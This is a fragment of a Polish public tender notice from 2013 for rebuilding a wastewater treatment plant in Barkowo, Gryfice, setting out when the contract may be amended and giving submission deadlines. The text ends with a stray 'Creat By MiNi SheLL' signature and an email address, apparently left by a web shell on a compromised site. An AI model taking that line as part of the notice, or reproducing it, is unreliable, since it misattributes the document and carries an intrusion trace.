<p>Zamawiający na podstawie art. 144 ustawy Pzp dopuści zmianę umowy dotyczącą przedmiotu, urzędowej zmiany wysokości stawki podatku VAT, umówionego terminu wykonania zamówienia              i warunków realizacji umowy, w następujących przypadkach:

1. rezygnacji z wykonywania części (elementów) przedmiotu umowy przewidzianych                           
    w dokumentacji projektowej w sytuacji, gdy ich realizacja będzie zbędna do prawidłowego,                tj. zgodnego z zasadami wiedzy technicznej i obowiązującymi na  dzień odbioru robót przepisami, wykonania przedmiotu umowy. Roboty takie nazywane są robotami zaniechanymi. Sposób wyliczenia wartości tych robót określa § 2 ust. 5 wzoru umowy.

  2. zmiany urzędowej stawki podatku VAT. Strony umowy zobowiązują się do podpisania  
      aneksu do umowy regulującego wysokość podatku VAT i ceny brutto umowy.

3. opóźnień wynikających z:  
    a)	przestojów i opóźnień zawinionych przez Zamawiającego;
    b)	działania siły wyższej (np. klęski żywiołowe, strajki generalne lub lokalne), mającego 
          bezpośredni wpływ na terminowość wykonywania robót;
    c)	warunków atmosferycznych uniemożliwiających wykonywanie robót (z wyłączeniem 
          niedogodności związanych z pogodą, typową dla okresu wykonywania robót w miejscu  
          budowy) - fakt ten musi zostać udokumentowany  wpisem kierownika budowy                     
          do dziennika budowy oraz zgłoszony niezwłocznie Zamawiającemu; 
    d)	okoliczności, których Strony umowy nie były w stanie przewidzieć, pomimo zachowania 
          należytej staranności;
    e)	 wykopalisk uniemożliwiających wykonywanie robót;
    f)    podpisania umowy na zamówienia dodatkowe, o których mowa w art. 67 ust. 1 pkt 5 
          Prawa zamówień publicznych, o ile wykonywanie tych zamówień wpływa na termin 
          wykonania niniejszej umowy;
g)	istotnych braków lub błędów w dokumentacji projektowej, również tych polegających                  
          na niezgodności dokumentacji z przepisami prawa - termin umowny może zostać 
          wydłużony o czas niezbędny na usunięcie wad w projekcie przez Wykonawcę 
          dokumentacji projektowej.
    h)   działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są  
          konsekwencją winy którejkolwiek ze Stron.

  Opóźnienia, o których mowa w pkt 4, muszą być odnotowane w dzienniku budowy,  
  udokumentowane stosownymi protokołami podpisanymi przez kierownika budowy                    
  oraz zaakceptowane przez Zamawiającego.

4. 	zmiany kierownika budowy i kierowników robót (jedynie za uprzednią pisemną zgodą Zamawiającego). Wykonawca z własnej inicjatywy proponuje zmianę ww. osób                         w następujących przypadkach:
a)	śmierci, choroby lub innych zdarzeń losowych;
b) jeżeli zmiana tej osoby stanie się konieczna z jakichkolwiek innych przyczyn niezależnych  od Wykonawcy.

     Nowe osoby powołane do pełnienia w/w obowiązków muszą spełniać wymagania określone  
     w specyfikacji istotnych warunków zamówienia dla danej funkcji. Zamawiający może także 
     zażądać od Wykonawcy zmian osób, o których mowa w ust. 4, jeżeli uzna, że nie wykonują 
     należycie swoich obowiązków. Wykonawca obowiązany jest dokonać zmiany tych  osób                   
     w terminie nie dłuższym niż 14 dni od daty złożenia wniosku Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.zgk.gryfice.eu/zamowienia/pokaz/43.dhtml<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Gospodarki Komunalnej, ul. Zielona 5, 72-300 Gryfice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.11.2013 godzina 10:00, miejsce: Zakład Gospodarki Komunalnej w Gryficach, ul. Zielona 5, budynek Zarządu, sekretariat (pok. nr 4).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 03.12.2013.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie objęte jest Programem Rozwoju Obszarów Wiejskich na lata 2007-2013 w ramach działania 321 Podstawowe usługi dla gospodarki i ludności, tytuł operacji Przebudowa oczyszczalni ścieków w Barkowie gm. Gryfice, i finansowane do wysokości 75 % poniesionych kosztów kwalifikowanych operacji.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com